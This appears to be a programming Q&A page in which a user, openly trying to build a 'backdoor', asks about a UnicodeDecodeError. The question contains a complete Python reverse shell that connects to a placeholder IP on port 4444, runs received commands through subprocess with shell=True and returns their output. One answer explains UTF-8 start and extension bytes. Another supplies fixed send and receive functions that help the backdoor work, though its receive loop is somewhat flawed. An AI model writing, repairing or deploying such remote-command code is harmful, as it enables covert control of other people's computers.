# Why I get: UnicodeDecodeError: 'utf8' codec can't decode byte 0xa3 in position 52: invalid start byte?

Tags: python, encoding, utf-8

I'm trying to make a backdoor but this errors appears Why I get: UnicodeDecodeError: 'utf8' codec can't decode byte 0xa3 in position 52: invalid start byte?
Here is the code:

```
# -*- coding: ISO-8859-1 -*-


import socket
import subprocess
import json

class Backdoor: #les classes permeten "empaquetar" dades i funcionalitats junts
    def __init__(self, ip, port): 
      
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)
    
    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def executar_comand(self, command):
        return subprocess.check_output(command, shell=True) 
    
    def run(self):
        while True:
            command = self.reliable_recieve() 
            resultats_comand = self.executar_comand(command)
            self.reliable_send(resultats_comand) 
        connetcion.close()

porta = Backdoor("my ip",4444) 
porta.run()
```

Comment: I added a _[python]_ tag so your question will attract a wider audience.

Answer (score 1):

TLDR; your incoming characters are not encoded in UTF-8 but probably ISO-8859-1 judging by the comment at the top of the code and the broken byte, (0xA3 is £ in ISO-8859-1).

Long answer:

UTF-8 is a multibyte 8-bit character set. All the characters up to 0x7f i.e. those with a zero in the top bit of the first (and only) byte are the same as their ASCII equivalents.

All other characters are multibyte, consisting of a start byte and up to three extension bytes. The number of bytes in total is encoded by the number of leading 1 bits in the start byte

```
0xxxxxxx => 1 byte i.e. seven bit ASCII
110xxxxx => 2 bytes
1110xxxx => 3 bytes
11110xxx => 4 bytes
```

`0xA3` in binary is 10100011 which does not appear in the above list. The reason it doesn't appear is because the bit pattern 10xxxxxx is reserved to denote an extension byte.

For example ꔢ - a symbol randomly chosen from Unicode (U+a522) is encoded in UTF-8 as

11101010 10010100 10100010

The first byte starts with three leading ones meaning it is a three byte character and each of the two extension bytes starts with 10xxxxxx.

So, if the decoder encounters a byte in the input stream of the form 10xxxxxx (like 0xa3), without first having encountered a byte of the form 110xxxxx, 1110xxxx, 11110xxx, it knows this is not UTF-8. Part of the [standard](https://datatracker.ietf.org/doc/html/rfc8259) is that JSON must be encoded in UTF-8 (except in a closed ecosystem), so non UTF-8 characters are an error when decoding JSON.

If the source of the data is being sent as JSON encoded in something other than UTF-8 you can consider it a bug at the source. How you fix it depends on whether you have control of the source or not. If you don't, I'd convert the text to a string using the correct character encoding then convert it back to bytes using UTF-8 (or you may be able to convert direct from whatever to UTF-8 - it's quite straightforward with ISO-8859-1) and then plug it into your JSON deserialisation.

Answer (score 0):

The error is likely related to the encoding/decoding of the JSON data. JSON encoding/decoding in Python requires the data to be in a Unicode string format. So, make sure the data you are sending and receiving is encoded as UTF-8 before using these functions.

```
def reliable_send(self, data):
    json_data = json.dumps(data, ensure_ascii=False).encode('utf-8')
    self.connection.send(json_data)

def reliable_receive(self):
    json_data = b""
    while True:
        try:
            chunk = self.connection.recv(1024)
            if not chunk:
                break
            json_data += chunk
            return json.loads(json_data.decode('utf-8'))
        except ValueError:
            continue
```